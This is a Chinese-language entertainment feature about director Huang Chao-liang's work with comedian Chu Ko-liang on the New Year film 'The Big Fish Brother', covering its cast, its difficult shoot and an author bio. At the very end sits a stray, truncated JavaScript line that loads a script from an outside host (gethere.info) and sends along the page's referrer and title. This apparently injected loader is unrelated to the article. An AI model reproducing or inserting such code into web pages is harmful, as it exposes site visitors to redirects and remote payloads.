前作《大囍臨門》合作愉快「故事美,笑料佳,破兩億,還得獎」,導演黃朝亮向來被業界戲稱是跟豬哥亮「八字最合」的導演之一,今年再度合作賀歲片《大釣哥》,黃朝亮信誓旦旦有決心為草根魅力獨樹一幟的「豬式風格」留下銀幕經典。黃朝亮在接受專訪時,生動熱鬧地聊起跟豬哥亮一起催生《大釣哥》這個獨特故事過程裡的「火氣」跟「火花」,在炎炎溽暑中和「不把癌症當一回事」的豬哥亮並肩作戰的革命情誼,以及豬哥亮對於他整個導演歷程的特殊意義。

黃朝亮去年夏天以與豬哥亮合作的《大囍臨門》在馬來西亞的電影「金蝶獎」盛典大出風頭,一舉擒下「最佳影片」、「最佳導演」兩項大獎,對於「豬哥亮的電影終於跨出台灣,在國際舞台上感動人心,獲得推崇」他的反應特別深刻強烈,直呼這個獎比起破億的票房更有意義。

在所有跟豬哥亮聯袂出擊過「農曆春節檔」這個兵家必爭之地的電影導演裡,黃朝亮避開了用繁多的綜藝短劇哏「組裝」成一部大電影的手法,老老實實地深耕人物內在情感,嚴謹認真地經營故事情節的起承轉合,向來被業界公認是「讓豬哥亮顯得最有演技」的導演,而也正因為《大囍臨門》裡「讓彼此都發光」的合作經驗,當豬哥亮首次集資當老闆,會想都不想地便把這個重要性非比尋常的《大釣哥》徹底放心地交給黃朝亮掌舵執導。

 

▲導演黃朝亮(右)向來被業界戲稱是跟豬哥亮(右二)「八字最合」的導演之一。(圖/柯志遠,2017.01.03)

▲導演黃朝亮(右)向來被業界戲稱是跟豬哥亮(右二)「八字最合」的導演之一。(圖/,2017.01.03)

黃朝亮導演本身就是一個風格多變的有趣的人,舉手投足間有點在地的「草莽」氣息,但眼神、談吐裡卻又有著自成一格的「文青」風範,而這或許也是他的創作跨幅之所以如此寬廣的原因,不但豬式喜劇《大囍臨門》叫好叫座掀起市場熱潮,林美秀的《白天的星星》、張睿家的《夏天協奏曲》等文藝片,更曾多次為台灣電影市場帶來沁人心脾的溫馨清流。

黃朝亮在電影作品裡最一以貫之的創作風格,就是喜歡透過戲中人物去「挖掘出,還原出」一個演員深處真正的精神樣貌。以《大釣哥》裡合作的明星來說,藍正龍酷帥了那麼多年,其實卻有著像「藍小龍」那樣柔軟甚至軟弱的一面,面對人生裡的無可奈何,也會有「逃避」的衝動。謝沛恩,一直被放大外貌和氣質的「都會感」和「時尚感」,但在黃朝亮的觀察裡,戲中「黃心怡」個性裡體現台灣傳統女性的堅韌、包容和對情感的忠貞,是完全跟謝沛恩本人的理念不謀而合的。至於豬哥亮,黃朝亮則別有感慨地說:「每個人的人生都有不同的段落章節,到豬大哥目前這樣的年紀、心境,以前意興風發的氣勢,遊戲人間的詼諧,當然都還在,但更多的其實是回歸家庭的『父性』和『親情』,而這也是『藍大釣』這個角色,除了笑料之外,最想呈現出來讓觀眾看到並且感受到的。」

從初夏拍到入秋的《大釣哥》,拍攝過程中,歷經跋涉三分之二個台灣的遠征,以及颱風、暴雨、酷熱等等天候的折磨,還有武打、鋼絲等等「動作戲」帶來的演員受傷的風險,對於豬哥亮和黃朝亮來說,都可以說是有史以來最「辛苦」的一部電影。但黃朝亮聊起跟豬哥亮、藍正龍一起把故事構思得越來越豐富的「腦力激盪」過程,以及和楊貴媚、吳朋奉等演技高手間正能量的過招、較勁,認為這是一個收獲超多也超爽的經驗,而他以一個「現代架空」的故事舞台(電影充滿台灣的草根魅力,卻沒有鎖定是哪個年代的台灣),把「法庭戲」、「功夫戲」這些嶄新的元素天馬行空地融入進「豬式電影」裡的用心,則是他最期待獲得廣大觀眾們肯定的,《大釣哥》之不同以往的最大特色。

本文作者《柯志遠》作家,資深媒體人,知名娛樂評論家。紐約科技大學「傳播藝術」碩士。涉足娛樂產業二十餘年:電影行銷、頻道經營、新聞採訪、唱片企畫、時尚發行,專業經歷遍及PEOPLE雜誌、春暉電影、滾石唱片、MOD、VOGUE、GQ等公司要職。出版《惡女阿楚》、《一個台客在紐約》等15本著作。

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + “;